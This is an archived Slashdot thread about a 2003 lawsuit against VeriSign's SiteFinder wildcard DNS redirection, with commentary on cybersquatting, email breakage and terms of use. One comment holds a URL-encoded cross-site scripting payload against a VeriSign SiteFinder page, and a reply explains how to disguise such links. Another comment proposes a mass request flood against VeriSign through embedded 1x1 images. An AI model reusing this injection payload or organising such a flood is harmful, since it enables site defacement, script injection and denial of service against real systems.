Slashdot Mirror
VeriSign Sued Over SiteFinder Service
dmehus writes "It was only a matter of time, the pundits said, and they were right. Popular Enterprises, LLC., an Orlando, Florida based cybersquatting so-called 'search services' company, has filed a lawsuit in Orlando federal court against VeriSign, Inc. over VeriSign's controversial SiteFinder 'service.' While PopularEnterprises has had a dodgy history of buying up thousands of expired domain names and redirecting them to its Netster.com commercial "search services" site, the lawsuit is most likely a good thing, as it provides one more avenue to pursue in getting VeriSign to terminate SiteFinder. According to the lawsuit, the company contends alleges antitrust violations, unfair competition and violations of the Deceptive and Unfair Trade Practices Act. It asks the court to order VeriSign to put a halt to the service. VeriSign spokesperson Brian O'Shaughnessy said the company has not yet seen the lawsuit and that it doesn't comment on pending litigation."
Cybersquatting, though one of the great minor evils of the web, is damned hard to stop. I can't think of any way to regulate/legislate it without messing up the domain registration and transfer process for everyone else - though it would be nice to be able to buy domains BACK from these companies - I would imagine quie a few choice domains are in their hands. Nice to see a lawsuit taking on Verisign over this - even if it is a cybersquatter. I wonder if there's an intelligent way to reserve domain names for individuals and organizations which already have use for the name - maybe a form of 'prior branding' only better implemented...
I guess people will figure that the end justifies the means, but the argument still seems a little distasteful.
The bold print giveth, and the fine print taketh away
At the rate things are going, in a couple weeks, no one will be able to get to their search engine site at all, whether they want to or not.
Someone probably deserves recompensation for the hassle, but it's looking like the Internet has proven resilient to even this "high level" attack.
Bush: He's Liberal in all the wrong ways.
you did notice that the link you click is actually not a link to the site, right? It goes through some javascript and then redirects you.
I don't like that shit, I don't trust Verisign.
My browsers - Firebird and IE both keep history for a few days. It used to be that when i accidentally typed something in and the domain could not be found that it wouldn't be in my history since it wouldn't resolve. Now - thanks to URL resolving my history is gradually starting to fill full of crap. So when im in a hurry and select something out of my history i sometimes end up getting a sitefinder page instead of what I was looking for. ARRRGH.
Verisign Sucks. They always have and always will.
-
aphex
I Steal Music!
I sent an email to various VeriSign addresses about their abuse. Somehow one of them got routed to a Network Solutions drone.
The drone informed me in a form letter that VeriSign's practices were "well within the guidelines" established by the document Domain Name System Wildcards in Top-Level Domain Zones.
After deconstructing this, we are left with: VeriSign is within the guidelines of the document VeriSign wrote on the matter.
Uhm...
That's what it's called.
If it were the gold rush days of the internet, sites like www.greatdeals.com and www.coffee.com and other pretty easily guessed site names would make excellent speculatory investments. Those are all gone now, of course. But in those days was it really that bad to take common words and phrases and register them in hopes of selling them to money flushed dot coms?
wherein, "intercept" means the aural or other acquisition of the contents of any wire, electronic, or oral communication through the use of any electronic, mechanical, or other device;
The ECPA also provides that "In a civil action under this section, appropriate relief includes--(1) such preliminary and other equitable or declaratory relief as may be appropriate;(2) damages under subsection (c); and (3) a reasonable attorney's fee and other litigation costs reasonably incurred.
Damages.--The court may assess as damages in a civil action under this section the sum of the actual damages suffered by the plaintiff and any profits made by the violator as a result of the violation, but in no case shall a person entitled to recover receive less than the sum of $1,000.
Seems like a good case can be that emails to mistyped addresses are being intercepted by Verisign. Certainly, the emails where not intended to be sent to Verisign, and they appear to be collecting some information from the email (the from address).
--------
The fake Gzip Christ isn't not user number ~0xA6CA7
In this article on on CNET O'Shaughnessy said "the service has been embraced by end users. "We've seen nothing but very positive results from the Internet community," he said. "Usage is extraordinary. Both individual users and enterprises are giving very positive feedback."
So they are attributing a slashdotting, and a lot of media interest to people being positive about the service. I haven't seen one article, comment or anything that was even remotely positive. What are these guys on?
He also claims they are fully compliant with every RFC. I don't see how this is possible, unless they have found some loophole.
If putting in
www.icarusindi.com
would list
www.icarusindie.com
as a suggested site. But it doesn't. It lists a number of domains that are off quite a few letters more than 1.
If it were at least making an intelligent attempt at getting the user where they wanted to go it could be argued that it is at least useful. Microsoft's search that comes up when you get a DNS error on some domain names is excellent about getting you where you actually wanted to go.
Verisign either gives a half assed attempt at correcting the user or deliberatly ignores domains that aren't registered through them. Despite the fact they get money regardless of who you register through.
Now we just need a credible plaintiff. Preferably a class action suit to maximize damages.
Ben
Work Safe Porn
Does anyone have a list of IP's / IP blocks that Verisign owns? I am going to set up my firewall to not allow any traffic to or from them.
All of them.
I suggest you do the same if you feel strongly about this.
Verisign, so you want every non-existent domain to resolve to your IPs'? I'm going to give you the opposite. Not only will nothing go to your SiteFinder service, but all your *real* domains like verisign.com will be cut off too.
Its time to go.
Has anyone else noticed this? It returns a sitefinder page immediately for blahblahsucks.com, but nada for verisignsucks.com.
If enough of us request this here, perhaps their online techs will spread the word to SBC NOC/management to do so.
"I drank what?" -Socrates
[Full-Disclosure Mail Link]
Verisign has hired Omniture to collect info on what people misspell. While the website may seem clean and useful, it may not be, depending on what your take on privacy is.
-- I'd say your post was about 3 monkeys, 18 minutes.
I notice at the bottom of the sitefinder service page it has a "terms of service" link. I hereby declare that I do not agree to those terms of service. Now what? Do I stop getting redirected to that page?
President ISES
(International Society for Elimination of Sigs)
Consider giving SiteFinder urls like "Persons-Name-MD.com". Note there's a "health" link on the resulting page.
In many places it's a serious offense to pose as a physician.
Furthermore, note that the SiteFinder page might very well suggest other physicians' web sites. Doing medical referrals has its own set of legal issues.
I truly thank VeriSign's lovely spam service.
.com domain or .net domain is returning an SOA record and none of these messages are being blocked.
Someone a few months ago mentioned to me that Sendmail has a feature where, upon receiving mail, it will check the domain of the sender. If the domain does not exist, it has a forged From: header and is obviously spam.
Thanks to Verisign's efforts to piss me off, every DNS query on a nonexistant
Since this "service" has been implemented, I've gone from 7-8 spams a day to 30-35.
Thanks a lot, assholes.
Never thought it'd happen, but I'm rooting for the squatter... if there's a group worse than spammers and domain squatters, it's Verisign. Just on a whim, I typed in a non-existent domain name, and sure enough, found myself on their page. Take a look at the "Terms of Use". Sections 2 and 14 are really telling:
2. You may have accessed the VeriSign Service(s) by initiating a query to our DNS resolution service for a nonexistent domain name.
14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference.
I'm not sure how the came up with the fact that I, the end user, made a query to their DNS server. In fact, I did not. My ISP may be using their services, but I personally have no legal relationship with Verisign whatsoever. My ISP may be using their services, but that in no way establishes a relationship between myself and Verisign. IMO, unless you're querying Verisign directly, their terms of use cannot possibly apply -- which means that they apply to almost noone. I would challenge them to show any log that shows my IP address accessing their service. If they can't, then I did not in fact access their service.
And what's worse is the implication that I can bound by "Terms of Use" that I have never seen, based on the assumption that I made the query, when in fact the query mas made to a DNS server at my ISP (and again, I don't really care how my ISP handles that request as long as it sends me the requested info.
Why didn't this info leak before VS turned on the switch? That's the most surprising thing about the whole deal to me.
The backlash against VS should have started BEFORE they went through with this decision -- and that backlash should have been OVERWHELMING, as in, every sysadmin with DNS should have been complaining, ISP's should have been filing motions for restraining orders, and ICANN should have been ready to pull the gTLD contract once and for all.
-fb Everything not expressly forbidden is now mandatory.
SCO could sue VeriSign about www.scocks.com
Here's hoping someone at SCO reads this.
All errors in this comment are mine. Corrections are considered a derivative work, and punishable under copyright law.
At what cost? Routers are working harder, code has been introduced into core servers that has no technical reason to exist, and an IP address, or possibly a sizeable range of IP addresses are now blacklisted worldwide.
Well, not really. Just that no A records can reliably point into those blocks now, since the "quick fix" that tons of people used just blocked a few subnets owned by verisign. Of course, verisign has bunches of subnets where they can point this thing, and that quick fix is going to expire pretty quickly. The not-so-quick fix for BIND (the one that only respects NS records from the root servers) is also easily evaded by VeriSign.
What network operators need to do is track down every last IP block that verisign owns and start broadcasting NULL routes for those blocks. Forget about spotty reception of a handful of IPs, Verisign would effectively be off the Internet. We'd lose root servers 'a' and 'j', but we'd gain an Internet without verisign, and I don't think anyone would argue that that was a bad thing. Explain to companies like this "If you pull rank on us, we take our toys (and your entire revenue stream) and go home."
One comment I've seen noted about the whole SiteFinder thing is that Verisign now resolves domains which are not available for registration, so it's possible they're profiting from something that they're not allowing others to purchase.
... you can't buy single character gTLDs)
(Try www.a.com, www.b.com, etc
when the url is decoded it is [...]
2 D%2D%3E%3C%2F%73%63%72%69%70%74%3E%22%2F%2F%2D%2D% 3E%3C%2F%73%63%72%69%70%74%3E%3E%3C%66%6F%6E%74%20 %73%69%7A%65%3D%22%2B%33%22%3E%3C%62%3E%49%66%20%3 C%65%6D%3E%73%68%65%3C%2F%65%6D%3E%20%6C%6F%76%65% 73%20%75%73%20%74%68%65%6E%20%77%65%20%3C%65%6D%3E %68%61%76%65%3C%2F%65%6D%3E%20%74%6F%20%62%65%20%6 3%6F%6F%6C%21%3C%62%72%3E%3C%69%6D%67%20%73%72%63% 3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%61%74%72 %69%63%6B%2E%66%6D%2F%62%6F%6F%62%69%65%73%2F%62%6 F%6F%62%69%65%73%2E%70%68%70%3F%74%65%78%74%3D%56% 65%72%69%53%69%67%6E%22%3E%3C%62%72%3E%56%65%72%69 %53%69%67%6E%21%20%48%6F%74%20%62%61%62%65%73%20%6 C%6F%76%65%20%75%73%21%20%59%6F%75%20%73%68%6F%75% 6C%64%20%74%6F%6F%21%3C%62%72%3E%3C%62%72%3E%3C%62 %72%3E%3C%62%72%3E%3C%2F%66%6F%6E%74%3E
Yes, and it can be encoded as:
http://sitefinder.verisign.com/lpc?url=%27%2F%2F%
(as one word, without the spaces inserted by slashdot)
which hides everything from the user who looks at such a link.
I hate your goatse version but I wonder what other creative slashdot hackers will invent. Remember that you can use javascript! Actually, you start inside javascript, so you don't even have to close the <script> tag at all, thanks to nice people at Omniture, Inc.
2. NATURE OF THE VERISIGN SERVICES.
You may have accessed the VeriSign Service(s) by initiating a query to our DNS resolution service for a nonexistent domain name. We are unable to resolve such queries through the DNS resolution service.
They are, and they do. They resolve such queries to 64.94.110.11.
Stop worrying about the risks of nuclear power and start worrying about the risks of not using nuclear power.
Except that's not true -- if Verisign doesn't want you to have a domain you don't get it, period. Their ToS, and as a result, the ToS of all DNS registrars allow them to deny registrations at will.
Now if they actually did this regularly they'd get sued, but not wanting is hardly the same as not being capable.
I have simply sent them an email and more importantly a 'letter' that informs Verisign that I do not accept their terms of service and that I am seeking their advice on how to stop making use of their software, considering I do not meet their terms of service.
I have informed them that if they cannot stop providing me with this service, (for which I do not accept their terms, and by which I cannot be bound) then they will have to contact me to negotiate a new set of terms to which I do agree.
I would imagine that if every user that is upset by this new 'service' was to do the same then Verisign would have to do 'something' about it.
They started to block the site somewhen on tuesday I think. Reports vary, some say that only port 80 on that one IP is blocked, others say the whole site is unreachable.
If a train station is a place where a train stops, what's a workstation?
I registered a domain name last night for the girl who took our wedding photos. I paid for it, filled out the info, and now when I go there, I get ads for her competition. If that isn't an unfair business practice, I don't know what is.
666-607: 6th floor apartment of the beast
Verisign doesn't want to NXDOMAIN? Fine then we should all give Verisign what it asks for - traffic to nonexistent domains.
Y'know those "ribbon" stuff people used to put on their webpages as a sign of protest?
Well here's my suggestion, every protester should use a "broken ribbon" logo on their webpage that's pointed to a random nonexistent url e.g. random.nonexistent.site.com.
e.g. img src="http://www.jrytcmtproyncz.com/" height=1 width=1
(Leaving the angle brackets out because Slashdot's engine sucks - it's too stupid to treat plain old text as plain old text.)
You should use a random img url but it doesn't have to change much if at all.
The height and width should be set to 1 so that if some idiot tries to push an offensive image, it doesn't get seen by the person viewing your webpage.
You could in theory construct a broken ribbon logo with an html table of different 1x1 imgs (all different URLs). 16 by 16 pixel icon could be 64 requests to nonexistent domains (drawing the ribbon), and the rest point to single background 1x1 image.
Then if Verisign figures out a cheap way to deal with all the SYN packets heading their direction and still redirect users to a webpage, they'll have solved the "defend against DDOS SYN flood" problem.
Some people say there's no technical solution to this problem.
But add enough people and this might work.
Slashdot and a few other popular sites could do this too.
Not at all.
There's a notice on one of their policy pages that they'll give a domain to anyone with a valid claim (Trademark, etc). I e-mailed the provided address, stating that A: I was the original registrant and B: It's my name. They got back to me in under 24 hours to arrange the transfer.
TODO: Something witty here...
I called them just now and basically said the stuff above. I own a few domain names bought from them, and will be transferring them to another provider. When I told them why, they read off a script that told me why their service was so great. Here's their answers and my responses:
"Before, the user would get an unhelpful error message. Now, users always know where to go!"
"That's good on paper, but the problem is that DNS is an inappropriate area to conduct that redirection. Yahoo or Google.com are well-known and can supply searches if users don't know where to go. In addition, Microsoft has a search feature in Explorer that redirects users to MSN. Putting this feature in DNS breaks the Internet technical specifications, called RFCs, and damages many processes on the Internet."
"This won't affect your domain names, people will still be able to get to you."
"The main problem is that Internet processes -- mail, DNS, and transfer-related software -- often use the information that no site was found in order to know what to do next. If a domain name always gets resolved, much of it will break."
"Verisign has set this up as a feature to improve the Internet."
"I'm sorry, but I don't believe that; your company has a lot of bright people working for it who know that this is not a feature in any way, shape, or form. It's my opinion that Verisign is trying to grab traffic from well-known search sites by using its control of the .com and .net TLDs to redirect users to a search engine branded by Verisign. I'm not going to transfer my domains yet, because I'm going to wait and see for a week or two, because I'm hoping your company will change their minds and understand that this isn't a good thing for the Internet. But I am going to transfer them if this issue does not get resolved."
Anyway, they gave me this email address: sitefinder@verisign-grs.com . Send 'em an email. And call that number! Be patient -- it's not the call-center people's fault and they won't like being screamed at -- but be firm, because they're reciting from a brochure given them by upper management, and they're going to give you the canned answers found above. The call-center girl sounded pretty tired of answering this, and I figure a lot of people are complaining. If they see half their business disappearing down the tube, maybe they'll see the light. ;)
There's no sig like this sig anywhere near this sig, so this must be the sig.
a) Xenu's Link Sleuth is a Windows program that checks broken links
b) Xenu is an excellent worldwide free product written by Tilman Hausherr
c) Tilman fights Scientology
d) Verisign is controlled by Scientology (can't prove it, so)
e) Verisign lauch Sitefinder
f) Xenu.exe program is almost unusable
My two cents.